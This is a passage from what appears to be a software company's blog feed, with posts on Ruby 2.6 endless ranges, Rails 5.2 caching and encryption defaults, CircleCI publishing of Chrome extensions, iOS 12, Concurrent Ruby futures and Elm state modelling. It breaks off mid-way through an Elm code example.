      <content type="html"><![CDATA[<p>Before Ruby 2.6, if we want endless loop with index, we would need to use<a href="http://ruby-doc.org/core-2.5.1/Float.html#INFINITY">Float::INFINITY</a> with<a href="http://ruby-doc.org/core-2.5.1/Integer.html#method-i-upto">up to</a> or<a href="http://ruby-doc.org/core-2.5.1/Range.html">Range</a>, or use<a href="http://ruby-doc.org/core-2.5.1/Numeric.html#method-i-step">Numeric#step</a>.</p><h5>Ruby 2.5.0</h5><pre><code class="language-ruby">irb&gt; (1..Float::INFINITY).each do |n|irb\* # logic goes hereirb&gt; end</code></pre><p>OR</p><pre><code class="language-ruby">irb&gt; 1.step.each do |n|irb\* # logic goes hereirb&gt; end</code></pre><h4>Ruby 2.6.0</h4><p>Ruby 2.6 makes infinite loop more readable by changing mandatory second argumentin range to optional. Internally, Ruby changes second argument to <code>nil</code> ifsecond argument is not provided. So, both <code>(0..)</code> and <code>(0..nil)</code> are same inRuby 2.6.</p><h6>Using endless loop in Ruby 2.6</h6><pre><code class="language-ruby">irb&gt; (0..).each do |n|irb\* # logic goes hereirb&gt; end</code></pre><pre><code class="language-ruby">irb&gt; (0..nil).size=&gt; Infinityirb&gt; (0..).size=&gt; Infinity</code></pre><p>In Ruby 2.5, <code>nil</code> is not an acceptable argument and <code>(0..nil)</code> would throw<code>ArgumentError</code>.</p><pre><code class="language-ruby">irb&gt; (0..nil)ArgumentError (bad value for range)</code></pre><p>Here is the relevant<a href="https://github.com/ruby/ruby/commit/7f95eed19e22cb9a4867819355fe4ab99f85fd16">commit</a>and <a href="https://bugs.ruby-lang.org/issues/12912">discussion</a> for this change.</p><p>The Chinese version of this blog is available<a href="http://madao.me/yi-ruby-2-6-zeng-jia-wu-qiong-fan-wei/">here</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5.2 added method write_multi to cache store]]></title>
       <author><name>Rohan Pujari</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5.2-adds-write_multi-for-cache-writes"/>
      <updated>2018-07-03T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5.2-adds-write_multi-for-cache-writes</id>
      <content type="html"><![CDATA[<p>Before 5.2 it was not possible to write multiple entries to cache store in oneshot even though cache stores like Redis has<a href="https://redis.io/commands/mset"><code>MSET</code></a> command to set multiple keys in asingle atomic operation. However we were not able to use this feature of Redisbecause of the way Rails had implemented caching.</p><p>Rails has implemented caching using an abstract class<code>ActiveSupport::Cache::Store</code> which defines the interface that all cache storeclasses should implement. Rails also provides few common functionality that allcache store classes will need.</p><p>Prior to Rails 5.2 <code>ActiveSupport::Cache::Store</code> didn't have any method to setmultiple entities at once.</p><p>In Rails 5.2, <a href="https://github.com/rails/rails/pull/29366">write_multi was added</a>. Each cache store can implement this method and provide the functionality toadd multiple entries at once. If cache store does not implement this method,then the default implementation is to loop over each key value pair and sets itindividually using <code>write_entity</code> method.</p><p>Multiple entities can be set as shown here.</p><pre><code class="language-ruby">Rails.cache.write_multi name: 'Alan Turning', country: 'England'</code></pre><p><a href="https://github.com/redis-store/redis-rails">redis-rails</a> gem provides redis ascache store. However it does not implement <code>write_multi</code> method.</p><p>However if we are using Rails 5.2, then there is no point in using <code>redis-rails</code>gem, as Rails 5.2 comes with built in support for redis cache store, whichimplements <code>write_multi</code> method. It was added by<a href="https://github.com/rails/rails/pull/31134">this PR</a>.</p><p>We need to make following change.</p><pre><code class="language-ruby"># beforeconfig.cache_store = :redis_store# afterconfig.cache_store = :redis_cache_store</code></pre><p><code>redis-rails</code> repo has a<a href="https://github.com/redis-store/redis-rails/pull/81">pull request</a> to notifyusers that development of this gem is ceased. So it's better to use redis cachestore that comes with Rails 5.2.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Continuous release of a chrome extension using CircleCI]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/continuously-upload-chrome-extension-with-circleci"/>
      <updated>2018-06-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/continuously-upload-chrome-extension-with-circleci</id>
      <content type="html"><![CDATA[<p>We have recently worked on many chrome extensions. Releasing new chromeextensions manually gets tiring after a while.</p><p>So, we thought about automating it with CircleCI, similar to continuousdeployment.</p><p>We are using the following configuration in <code>circle.yml</code> to continuously releasechrome extensions from the master branch.</p><pre><code class="language-yaml">workflows:  version: 2  main:    jobs:      - test:          filters:            branches:              ignore: []      - build:          requires:            - test          filters:            branches:              only: master      - publish:          requires:            - build          filters:            branches:              only: masterversion: 2jobs:  test:    docker:      - image: cibuilds/base:latest    steps:      - checkout      - run:          name: &quot;Install Dependencies&quot;          command: |            apk add --no-cache yarn            yarn      - run:          name: &quot;Run Tests&quot;          command: |            yarn run test  build:    docker:      - image: cibuilds/chrome-extension:latest    steps:      - checkout      - run:          name: &quot;Install Dependencies&quot;          command: |            apk add --no-cache yarn            apk add --no-cache zip            yarn      - run:          name: &quot;Package Extension&quot;          command: |            yarn run build            zip -r build.zip build      - persist_to_workspace:          root: /root/project          paths:            - build.zip  publish:    docker:      - image: cibuilds/chrome-extension:latest    environment:      - APP_ID: &lt;APP_ID&gt;    steps:      - attach_workspace:          at: /root/workspace      - run:          name: &quot;Publish to the Google Chrome Store&quot;          command: |            ACCESS_TOKEN=$(curl &quot;https://accounts.google.com/o/oauth2/token&quot; -d &quot;client_id=${CLIENT_ID}&amp;client_secret=${CLIENT_SECRET}&amp;refresh_token=${REFRESH_TOKEN}&amp;grant_type=refresh_token&amp;redirect_uri=urn:ietf:wg:oauth:2.0:oob&quot; | jq -r .access_token)            curl -H &quot;Authorization: Bearer ${ACCESS_TOKEN}&quot; -H &quot;x-goog-api-version: 2&quot; -X PUT -T /root/workspace/build.zip -v &quot;https://www.googleapis.com/upload/chromewebstore/v1.1/items/${APP_ID}&quot;            curl -H &quot;Authorization: Bearer ${ACCESS_TOKEN}&quot; -H &quot;x-goog-api-version: 2&quot; -H &quot;Content-Length: 0&quot; -X POST -v &quot;https://www.googleapis.com/chromewebstore/v1.1/items/${APP_ID}/publish&quot;</code></pre><p>We have created three jobs named as <code>test</code>, <code>build</code> and <code>publish</code> and used thesejobs in our workflow to run tests, build the extension, and publish them to thechrome store, respectively. Every step requires the previous step to runsuccessfully.</p><p>Let's check each job one by one.</p><pre><code class="language-yaml">test:  docker:    - image: cibuilds/base:latest  steps:    - checkout    - run:        name: &quot;Install Dependencies&quot;        command: |          apk add --no-cache yarn          yarn    - run:        name: &quot;Run Tests&quot;        command: |          yarn run test</code></pre><p>We use <a href="https://github.com/cibuilds/base">cibuilds</a> docker image for this job.First, we do a checkout to the branch and then use <code>yarn</code> to installdependencies. Alternatively, we can use <code>npm</code> to install dependencies as well.Then, as the last step, we are use <code>yarn run test</code> to run tests. We can skipthis step if running tests is not needed.</p><pre><code class="language-yaml">build:  docker:    - image: cibuilds/chrome-extension:latest  steps:    - checkout    - run:        name: &quot;Install Dependencies&quot;        command: |          apk add --no-cache yarn          apk add --no-cache zip          yarn    - run:        name: &quot;Package Extension&quot;        command: |          yarn run build          zip -r build.zip build    - persist_to_workspace:        root: /root/project        paths:          - build.zip</code></pre><p>For building chrome extensions, we use the<a href="https://github.com/cibuilds/chrome-extension">chrome-extension</a> image. Here, wealso first do a checkout and then, install dependencies using yarn. Note, we areinstall zip utility along with yarn because we need to zip our chrome extensionbefore publishing it in next step. Also, we are not generating version numberson our own. The version number will be picked from the manifest file. This stepassumes that we have a task named <code>build</code> in <code>package.json</code> to build our app.</p><p>The Chrome store rejects multiple uploads with the same version number. So, wehave to make sure to update the version number, which should be unique in themanifest file before this step.</p><p>In the last step, we use <code>persist_to_workspace</code> to make <code>build.zip</code> availablefor the next step, publishing.</p><pre><code class="language-yaml">publish:  docker:    - image: cibuilds/chrome-extension:latest  environment:    - APP_ID: &lt;APP_ID&gt;  steps:    - attach_workspace:        at: /root/workspace    - run:        name: &quot;Publish to the Google Chrome Store&quot;        command: |          ACCESS_TOKEN=$(curl &quot;https://accounts.google.com/o/oauth2/token&quot; -d &quot;client_id=${CLIENT_ID}&amp;client_secret=${CLIENT_SECRET}&amp;refresh_token=${REFRESH_TOKEN}&amp;grant_type=refresh_token&amp;redirect_uri=urn:ietf:wg:oauth:2.0:oob&quot; | jq -r .access_token)          curl -H &quot;Authorization: Bearer ${ACCESS_TOKEN}&quot; -H &quot;x-goog-api-version: 2&quot; -X PUT -T /root/workspace/build.zip -v &quot;https://www.googleapis.com/upload/chromewebstore/v1.1/items/${APP_ID}&quot;          curl -H &quot;Authorization: Bearer ${ACCESS_TOKEN}&quot; -H &quot;x-goog-api-version: 2&quot; -H &quot;Content-Length: 0&quot; -X POST -v &quot;https://www.googleapis.com/chromewebstore/v1.1/items/${APP_ID}/publish&quot;</code></pre><p>For publishing of the chrome extension, we use the<a href="https://github.com/cibuilds/chrome-extension">chrome-extension</a> image.</p><p>We need <code>APP_ID</code>, <code>CLIENT_ID</code>, <code>CLIENT_SECRET</code> and<code>REFRESH_TOKEN</code>/<code>ACCESS_TOKEN</code> to publish our app to the chrome store.</p><p><code>APP_ID</code> needs to be fetched from<a href="https://chrome.google.com/webstore/developer/dashboard">Google Webstore Developer Dashboard</a>.<code>APP_ID</code> is unique for each app whereas <code>CLIENT_ID</code>, <code>CLIENT_SECRET</code> and<code>REFRESH_TOKEN</code>/<code>ACCESS_TOKEN</code> can be used for multiple apps. Since <code>APP_ID</code> isgenerally public, we specify that in the yml file. <code>CLIENT_ID</code>, <code>CLIENT_SECRET</code>and <code>REFRESH_TOKEN</code>/<code>ACCESS_TOKEN</code> are stored as private environment variablesusing CircleCI UI. For cases when our app is unlisted in the chrome store, weneed to store <code>APP_ID</code> as a private environment variable.</p><p><code>CLIENT_ID</code> and <code>CLIENT_SECRET</code> need to be fetched from<a href="https://console.developers.google.com/">Google API console</a>. There, we need toselect a project and then click on the credentials tab. If there is no project,we need to create one and then access the credentials tab.</p><p><code>REFRESH_TOKEN</code> needs to be fetched from Google API. It also defines the scopeof access for Google APIs. We need to refer to<a href="https://developers.google.com/identity/protocols/OAuth2WebServer">Google OAuth2</a>for obtaining the refresh token. We can use any language library.</p><p>In the first step of the <code>publish</code> job, we are attaching a workspace to access<code>build.zip</code>, which was created previously. Now, by using all the required tokensobtained previously, we need to obtain an access token from Google OAuth API(Link is not available), which must be used to push the app to the chrome store.Then, we make a <code>PUT</code> request to the Chrome store API to push the app, and thenuse the same API again, to publish the app.</p><p>Uploading via API has one more advantage over manual upload. Manual uploadgenerally takes up to 1 hour to show the app in the chrome store. Whereasuploading using Google API generally reflects the app within 5-10 minutes,considering app does not go for a review by Google.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5.2 uses AES-256-GCM authenticated encryption]]></title>
       <author><name>Sushant Mittal</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-2-uses-aes-256-gcm-authenticated-encryption-as-default-cipher-for-encrypting-messages"/>
      <updated>2018-06-26T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-2-uses-aes-256-gcm-authenticated-encryption-as-default-cipher-for-encrypting-messages</id>
      <content type="html"><![CDATA[<p>Before Rails 5.2, <code>AES-256-CBC</code> authenticated encryption was the default cipherfor encrypting messages.</p><p>It was proposed to use <code>AES-256-GCM</code> authenticated encryption as the defaultcipher for encrypting messages because of following reasons:</p><ul><li>It produces shorter ciphertexts and performs quick encryption and decryption.</li><li>It is less error prone and more secure.</li></ul><p>So, <code>AES-256-GCM</code> became<a href="https://github.com/rails/rails/pull/29263">default cipher</a> for encryptingmessages in Rails 5.2 .</p><p>If we do not want <code>AES-256-GCM</code> as default cipher for encrypting messages in ourrails application, then we can disable it.</p><pre><code class="language-ruby">Rails.application.config.active_support.use_authenticated_message_encryption = false</code></pre><p>Default Encryption for cookies and sessions was also updated to use<code>AES-256-GCM</code> <a href="https://github.com/rails/rails/pull/28132">in this pull request</a>.</p><p>If we do not want <code>AES-256-GCM</code> as default encryption of cookies and sessions,then we can disable it too.</p><pre><code class="language-ruby">Rails.application.config.active_support.use_authenticated_cookie_encryption = false</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Our Thoughts on iOS 12]]></title>
       <author><name>Rishi Mohan</name></author>
      <link href="https://www.bigbinary.com/blog/ios-12"/>
      <updated>2018-06-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ios-12</id>
      <content type="html"><![CDATA[<p><img src="/blog_images/2018/ios-12/ios-12-lock-home-screen.png" alt="iOS 12 on iPhone 8 Red"></p><p>Apple announced iOS 12 at WWDC 2018 a few days back. Being honest, it was a bitdisappointing to see some of the most requested features not being there iniOS 12. Like users have been asking for Dark mode since before iOS 11, and theability to set default apps. Its more of an update focussed on performanceimprovements, usability, and compatibility. The fact that iOS 12 is alsoavailable for the iPhones Apple released 5 years back is a great effort fromApple to keep users happy. And unlike last couple of years, this time we decidedto calm our curiosities and installed iOS 12 beta 1 on our devices right awayafter Apple released it for developers. This blog is based on our experiencewith iOS 12 on iPhone 8 Plus.</p><h2>Installing iOS 12 on your iPhone</h2><p>First things first, make sure you have iPhone 5s or newer. And before gettingstarted, plug-in your phone to iTunes and take a full-backup in case your phonegets bricked while installing iOS 12, which is very unlikely.</p><p>Once done, download and install<a href="https://beta.thuthuatios.com/en/">beta profile</a>{:target=&quot;_blank&quot;} for iOS 12and then download and update from Software Update section just like youinstall a regular iOS update. Its a straightforward OTA update process whichyoure already familiar with.</p><p><strong>Note: This beta profile is from a third-party developer and is not officiallyfrom Apple. Apple will officially release public beta in around a month.</strong></p><p>Weve been running iOS 12 since last week now and here are our thoughts on theadditions and changes introduced in iOS 12.</p><h3>iOS 12 is fast</h3><p>The performance improvements are significant and definitely noticeable.Previously on iOS 11, while accessing spotlight by swiping down from homescreen, it used to lag. And not just that, sometimes keyboard didnt even usedto show up and we had to repeat the same action to make it work. But things arefaster and better in iOS 12. The keyboard gets up as soon as spotlight shows up.</p><p>Another thing that weve noticed is the multitasking shortcut for switching tothe last app by 3d touching on left wasn't that reliable in iOS 11, so much thatit was easy to ignore the feature altogether than to use it, but in iOS 12 thesame shortcut is very smooth. Although there are times when it still doesntwork well, but that's very rare.</p><p>Spotlight widgets load faster in iOS 12 than they used to in iOS 11. Apart fromthis, 3d touch feels pretty smooth too. Its good to see Apple squeezing out thepower to improve the already good performance in iOS.</p><h3>Notifications</h3><p>&lt;section style=&quot;float: right; max-width: 280px; margin-left: 30px;&quot;&gt;&lt;img src=&quot;/blog_images/2018/ios-12/ios-12-notifications.png&quot; alt=&quot;Notifications in iOS 12&quot;&gt;&lt;/section&gt;</p><p>Notifications in iOS 11 are a mess, theres no grouping, theres no way toquickly control notifications, theres no way to set priorities. Apple has addednotifications grouping and better notification management in iOS 12, so nownotifications from the same app are grouped together and you can control howoften you want to get notifications from the apps right from the notification.</p><p>We think the implementation can be a whole lot better. For the notificationsthat are grouped, you get to see only the last notification from that app, abetter way wouldve been to show two or three notifications and cut the rest.Theres no Notification pinning or snoozing which could've been very usefulfeatures.</p><h3>Screen time and App limits</h3><p>Theres a new feature in iOS 12 called Screen Time which is more like bird's-eyeview of your phone usage. Theres a saying that you cant improve something thatyou cant measure. Screen Time is a feature thats going to be very useful foreveryone who wants to cut down time on Social apps or overall phone usage. Itshows you every little detail of how many apps you use and for how much time andat what times. Not only this, it also keeps track of how many times you pickedup your phone, and how many notifications you receive from the apps you have onyour phone.</p><p><img src="/blog_images/2018/ios-12/ios-12-screen-time.png" alt="Screen Time in iOS 12"></p><p>Other useful sub-feature of Screen time is App limits, which allows you to setlimit on app usage based on app or category. So lets say you dont want to useWhatsApp for more than 30 mins a day, you can do that through App limits. Itworks for app categories including Games, Social Networking, Entertainment,Creativity, Productivity, Education, Reading &amp; Reference, Health &amp; Fitness. Soyou can limit it via category which works across apps. Plus, it syncs acrossyour other iOS devices, so you cant cheat that way.</p><h3>Siri and Shortcuts app</h3><p>&lt;section style=&quot;float: right; max-width: 250px; margin-left: 30px;&quot;&gt;&lt;img src='/blog_images/ios-12-thoughts/ios-12-siri-shortcuts.png' alt='Siri Shortcuts in iOS 12'&gt;&lt;/section&gt;</p><p>In iOS 12, you can assign custom shortcuts to Siri to trigger specific actions,which not only works for System apps but also with third-party apps. So now ifyou want to send a specific message to someone on WhatsApp, you can assign acommand for that to Siri and you can trigger that action just from Siri usingthat command.</p><p>Apple has also introduced a new app in iOS 12 called Shortcuts. Shortcuts applets you group actions and run those actions quickly. Although Shortcuts appisnt there in iOS 12 beta 1 but we think its one of best addition in iOS 12.</p><h3>Updated Photos app</h3><p>Photos app now has new section called &quot;For you&quot;, where it shows all the newAlbums, your best moments, share suggestions, photos and effect suggestions.This is more like the Assistant tab of Google Photos app. Also you can shareselected photos or albums with your friends right from the Photos app.</p><p>The Album tab in Photos app is redesigned for easier navigation. Also there's anew tab for Search which has been advanced, so you can now search photos usingtags like &quot;surfing&quot; and &quot;vacation&quot;.</p><p>It's good to see Apple paying attention to up the Photos app but we still thinkGoogle Photos is a better option for average person considering it lets youstore photos in Cloud for free. Also photo organization in Google Photos is muchbetter than in new Photos app in iOS 12.</p><h3>Enhanced Do Not Disturb Mode</h3><p>Do Not Disturb in iOS 12 is enhanced to be more flexible. You can now enable DoNot Disturb mode to end automatically in an hour, or at night, or according toyour Calendar events, or even based on your location.</p><p>Not just that, Do Not Disturb has a new <em>Bedtime mode</em> enabling which will shutall your notifications during bed time and dim your display. And when you willwake up, it'll show you a welcome back message along with weather details on thelock screen.</p><h3>Conclusion</h3><p>There are other updates and under the hood improvements as well, like <em>newMeasure app, redesigned iBooks app, tracking prevention, group FaceTime</em> etc.Overall, we think its an okay update considering there are not as many bugs asthere should be according to Apple standards. The force touch in the keyboard todrag cursor doesnt work, Skype and some other apps crash, but for the mostpart, its good enough to be installed on your primary device.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Using Concurrent Ruby in a Ruby on Rails Application]]></title>
       <author><name>Midhun Krishna</name></author>
      <link href="https://www.bigbinary.com/blog/using-concurrent-ruby-in-a-ruby-on-rails-application"/>
      <updated>2018-06-05T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/using-concurrent-ruby-in-a-ruby-on-rails-application</id>
      <content type="html"><![CDATA[<p><a href="https://github.com/ruby-concurrency/concurrent-ruby">Concurrent Ruby</a> is aconcurrency toolkit that builds on a lot of interesting ideas from manyfunctional languages and classic concurrency patterns. When it comes to writingthreaded code in Rails applications, look no further since concurrent ruby is<a href="https://github.com/rails/rails/blob/565ce0eaba233fcdd196c11715a8740bd571fd31/activesupport/activesupport.gemspec#L33">already included in Rails</a>via Active Support.</p><h3>Using Concurrent::Future</h3><p>In one of our applications, to improve performance we added threaded code using<a href="https://github.com/ruby-concurrency/concurrent-ruby">Concurrent::Future</a>. Itworked really well for us until one day it stopped working.</p><p>&quot;Why threads?&quot; one might ask. The code in question was a textbook threading usecase. It had a few API calls, some DB requests and finally an action that wasperformed on all the data that was aggregated.</p><p>Let us look at what this code looks like.</p><h4>Non threaded code</h4><pre><code class="language-ruby">selected_shipping_companies.each do | carrier |  # api calls  distance_in_miles = find_distance_from_origin_to_destination  historical_average_rate = historical_average_for_this_particular_carrier  # action performed  build_price_details_for_this_carrier(distance_in_miles,                                       historical_average_rate)end</code></pre><p>Converting the above code to use Concurrent::Future is trivial.</p><pre><code class="language-ruby">futures = selected_shipping_companies.map do |carrier|  Concurrent::Future.execute do    # api calls    distance_in_miles = find_distance_from_origin_to_destination    historical_average_rate = historical_average_for_this_particular_carrier    # action performed    build_price_details_for_this_carrier(distance_in_miles,                                         historical_average_rate)  endendfutures.map(&amp;:value)</code></pre><h3>A bit more about Concurrent::Future</h3><p>It is often intimidating to work with threads. They can bring in complexity andcan have unpredictable behaviors due to lack of thread-safety. Ruby, being alanguage of mutable references, we often find it difficult to write 100%thread-safe code.</p><p>Inspired by<a href="https://clojuredocs.org/clojure.core/future">Clojure's Future function</a>,Concurrent::Future is a primitive that guarantees thread safety. It takes ablock of work and performs the work asynchronously using Concurrent Ruby'sglobal thread-pool. Once a block of work is scheduled, Concurrent Ruby gives usa handle to this future work, on which when #value (or #deref) is called block'svalue is returned.</p><h3>The Bug</h3><p>Usually, when an exception occurs in the main thread, the interpreter stops andgathers the exception data. In the case of Ruby Threads, any unhandledexceptions are reported only when<a href="https://ruby-doc.org/core-2.2.0/Thread.html#method-i-join">Thread#join</a> iscalled. Setting <code>Thread#abort_on_exception</code> to <code>true</code>, is an better alternativewhich will cause all threads to exit when an exception is raised in any runningthread. We<a href="https://blog.bigbinary.com/2018/04/18/ruby-2-5-enables-thread-report_on_exception-by-default.html">published a blog</a>recently which talks about this in great detail.</p><h4>Exception handling in Concurrent Ruby</h4><pre><code class="language-ruby">future = Concurrent::Future.execute {            raise StandardError.new(&quot;Boom!&quot;)          }sleep(0.1) # giving arbitrary time for future to executefuture.value     #=&gt; nil</code></pre><p>Where did the exception go? This code fails silently and swallows theexceptions. How can we find out if the code executed successfully?</p><pre><code class="language-ruby">future = Concurrent::Future.execute {              raise StandardError.new(&quot;Boom!&quot;)          }sleep(0.1) # giving arbitrary time for future to executefuture.value     #=&gt; nilfuture.rejected? #=&gt; truefuture.reason    #=&gt; &quot;#&lt;StandardError: Boom!&gt;&quot;</code></pre><h3>How we fixed our issue</h3><p>We found places in our application where Concurrent::Future was used in a waythat would swallow exceptions. It is also a possibility that people mightoverlook the explicit need to manually report exception. We addressed theseconcerns with the following wrapper class.</p><pre><code class="language-ruby">module ConcurrentExecutor  class Error &lt; StandardError    def initialize(exceptions)      @exceptions = exceptions      super    end    def message      @exceptions.map { | e | e.message }.join &quot;\n&quot;    end    def backtrace      traces = @exceptions.map { |e| e.backtrace }      [&quot;ConcurrentExecutor::Error START&quot;, traces, &quot;END&quot;].flatten    end  end  class Future    def initialize(pool: nil)      @pool = pool || Concurrent::FixedThreadPool.new(20)      @exceptions = Concurrent::Array.new    end    # Sample Usage    # executor = ConcurrentExecutor::Future.new(pool: pool)    # executor.execute(carriers) do | carrier |    #   ...    # end    #    # values = executor.resolve    def execute array, &amp;block      @futures = array.map do | element |        Concurrent::Future.execute({ executor: @pool }) do          yield(element)        end.rescue do | exception |          @exceptions &lt;&lt; exception        end      end      self    end    def resolve      values = @futures.map(&amp;:value)      if @exceptions.length &gt; 0        raise ConcurrentExecutor::Error.new(@exceptions)      end      values    end  endend</code></pre><p>Please note that using Concurrent Ruby Futures caused segmentation fault whilerunning specs in Circle CI. As of this writing, we are using normal loopinginstead of Futures in Circle CI until the reason for the segfault is isolatedand fixed.</p><h3>Update</h3><p>Concurrent::Future also gives us another API which not only returns the value ofthe block but also posts/raises any exceptions that occur into the main thread.</p><pre><code class="language-ruby">thread_pool = Concurrent::FixedThreadPool.new(20)executors = [1, 2, 3, 4].map do |random_number|  Concurrent::Future.execute({ executor: thread_pool }) do    random_number / (random_number.even? ? 0 : 1)  endendexecutors.map(&amp;:value)=&gt; [1, nil, 3, nil]executors.map(&amp;:value!)&gt; ZeroDivisionError: divided by 0&gt; from (pry):4:in `/'</code></pre><p>We thank <a href="https://github.com/jrochkind">Jonathan Rochkind</a> for pointing us tothis undocumented api<a href="https://www.reddit.com/r/ruby/comments/8pedmm/using_concurrent_ruby_in_a_ruby_on_rails/">in his reddit post</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Modelling state in Elm to reflect business logic]]></title>
       <author><name>Ritesh Pillai</name></author>
      <link href="https://www.bigbinary.com/blog/modelling-state-in-elm-to-reflect-business-logic"/>
      <updated>2018-06-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/modelling-state-in-elm-to-reflect-business-logic</id>
      <content type="html"><![CDATA[<p>We recently made<a href="https://blog.bigbinary.com/2018/05/25/apisnapshot-built-using-elm-and-ruby-on-rails-is-open-source.html">ApiSnapshot open source</a>.As mentioned in that blog we ported code from React.js to Elm.</p><p>One of the features of <code>ApiSnapshot</code> is support for <code>Basic Authentication</code>.</p><p><img src="/blog_images/2018/modelling-state-in-elm-to-reflect-business-logic/apisnapshot-with-basic-authentication.png" alt="ApiSnapshot with basic authentication"></p><p>While we were rebuilding the whole application in Elm, we had to port the &quot;AddBasic Authentication&quot; feature. This feature can be accessed from the &quot;More&quot;drop-down on the right-hand side of the app and it lets user add username andpassword to the request.</p><p>Let's see how the <code>Model</code> of our Elm app looks.</p><pre><code class="language-elm">type alias Model ={ request : Request.MainRequest.Model, response : Response.MainResponse.Model, route : Route}</code></pre><p>Here is the Model in <em>Request.MainRequest</em> module.</p><pre><code class="language-elm">type alias APISnapshotRequest ={ url : String, httpMethod : HttpMethod, requestParameters : RequestParameters, requestHeaders : RequestHeaders, username : Maybe String, password : Maybe String, requestBody : Maybe RequestBody}type alias Model ={ request : APISnapshotRequest, showErrors : Bool}</code></pre><p><code>username</code> and <code>password</code> fields are optional for the users so we kept them as<code>Maybe</code> types.</p><p>Note that API always responds with <code>username</code> and <code>password</code> whether userclicked to add <code>Basic Authentication</code> or not. The API would respond with a<strong><em>null</em></strong> for both username and password when a user tries to retrieve asnapshot for which user did not fill <code>username</code> and <code>password</code>.</p><p>Here is a sample API response.</p><pre><code class="language-json">{  &quot;url&quot;: &quot;http://dog.ceo/api/breed/affenpinscher/images/random&quot;,  &quot;httpMethod&quot;: &quot;GET&quot;,  &quot;requestParams&quot;: {},  &quot;requestHeaders&quot;: {},  &quot;requestBody&quot;: null,  &quot;username&quot;: &quot;alanturning&quot;,  &quot;password&quot;: &quot;welcome&quot;,  &quot;assertions&quot;: [],  &quot;response&quot;: {    &quot;response_headers&quot;: {      &quot;age&quot;: &quot;0&quot;,      &quot;via&quot;: &quot;1.1 varnish (Varnish/6.0), 1.1 varnish (Varnish/6.0)&quot;,      &quot;date&quot;: &quot;Thu, 03 May 2018 09:43:11 GMT&quot;,      &quot;vary&quot;: &quot;&quot;,      &quot;cf_ray&quot;: &quot;4151c826ac834704-EWR&quot;,      &quot;server&quot;: &quot;cloudflare&quot;    },    &quot;response_body&quot;: &quot;{\&quot;status\&quot;:\&quot;success\&quot;,\&quot;message\&quot;:\&quot;https:\\/\\/images.dog.ceo\\/breeds\\/affenpinscher\\/n02110627_13221.jpg\&quot;}&quot;,    &quot;response_code&quot;: &quot;200&quot;  }}</code></pre><p>Let's look at the view code which renders the data received from the API.</p><pre><code class="language-elm">view : (Maybe String, Maybe String) -&gt; Html Msgview usernameAndPassword =case usernameAndPassword of(Nothing, Nothing) -&gt; text &quot;&quot;(Just username, Nothing) -&gt; basicAuthenticationView username &quot;&quot;(Nothing, Just password) -&gt; basicAuthenticationView &quot;&quot; password(Just username, Just password) -&gt; basicAuthenticationView username passwordbasicAuthenticationView : String -&gt; String -&gt; Html MsgbasicAuthenticationView username password =[ div [ class &quot;form-row&quot; ][ input[ type_ &quot;text&quot;, placeholder &quot;Username&quot;, value username, onInput (UpdateUsername)][], input[ type_ &quot;password&quot;, placeholder &quot;Password&quot;, value password, onInput (UpdatePassword)][], a[ href &quot;javascript:void(0)&quot;, onClick (RemoveBasicAuthentication)][ text &quot;&quot; ]]]</code></pre><p>To get the desired view we apply following rules.</p><ol><li>Check if both the values are string.</li><li>Check if either of the values is string.</li><li>Assume that both the values are <code>null</code>.</li></ol><p>This works but we can do a better job of modelling it.</p><p>What's happening here is that we were trying to translate our API responsesdirectly to the Model . Let's try to club username and password together into anew type called <em>BasicAuthentication</em>.</p><p>In the model add a parameter called <em>basicAuthentication</em> which would be of type<code>Maybe BasicAuthentication</code>. This way if user has opted to use basicauthentication fields then it is a <em>Just BasicAuthentication</em> and we can showthe input boxes. Otherwise it is <em>Nothing</em> and we show nothing!</p><p>Here is what the updated Model for <em>Request.MainRequest</em> would look like.</p><pre><code class="language-elm">type alias BasicAuthentication ={ username : String, password : String}type alias APISnapshotRequest ={ url : String, httpMethod : HttpMethod, requestParameters : RequestParameters, requestHeaders : RequestHeaders, basicAuthentication : Maybe BasicAuthentication, requestBody : Maybe RequestBody}type alias Model ={ request : APISnapshotRequest, showErrors : Bool}</code></pre><p>Elm compiler is complaining that we need to make changes to JSON decoding for<em>APISnapshotRequest</em> type because of this change.</p><p>Before we fix that let's take a look at how JSON decoding is currently beingdone.</p><pre><code class="language-elm">import Json.Decode as JDimport Json.Decode.Pipeline as JPdecodeAPISnapshotRequest : Response -&gt; APISnapshotRequestdecodeAPISnapshotRequest hitResponse =letresult =JD.decodeString requestDecoder hitResponse.bodyincase result ofOk decodedValue -&gt;decodedValue            Err err -&gt;                emptyRequestrequestDecoder : JD.Decoder APISnapshotRequestrequestDecoder =JP.decode Request|&gt; JP.optional &quot;username&quot; (JD.map Just JD.string) Nothing|&gt; JP.optional &quot;password&quot; (JD.map Just JD.string) Nothing</code></pre><p>Now we need to derive the state of the application from our API response .</p><p>Let's introduce a type called <em>ReceivedAPISnapshotRequest</em> which would be theshape of our old <em>APISnapshotRequest</em> with no <em>basicAuthentication</em> field. Andlet's update our <em>requestDecoder</em> function to return a Decoder of type<em>ReceivedAPISnapshotRequest</em> instead of <em>APISnapshotRequest</em>.</p><pre><code class="language-elm">type alias ReceivedAPISnapshotRequest ={ url : String, httpMethod : HttpMethod, requestParameters : RequestParameters, requestHeaders : RequestHeaders, username : Maybe String, password : Maybe String, requestBody : Maybe RequestBody}requestDecoder : JD.Decoder ReceivedAPISnapshotRequest</code></pre><p>We need to now move our earlier logic that checks to see if a user has opted touse the basic authentication fields or not from the view function to the<em>decodeAPISnapshotRequest</em> function.</p><pre><code class="language-elm">decodeAPISnapshotRequest : Response -&gt; APISnapshotRequestdecodeAPISnapshotRequest hitResponse =letresult =JD.decodeString requestDecoder hitResponse.bodyincase result ofOk value -&gt;letextractedCreds =( value.username, value.password )                    derivedBasicAuthentication =                        case 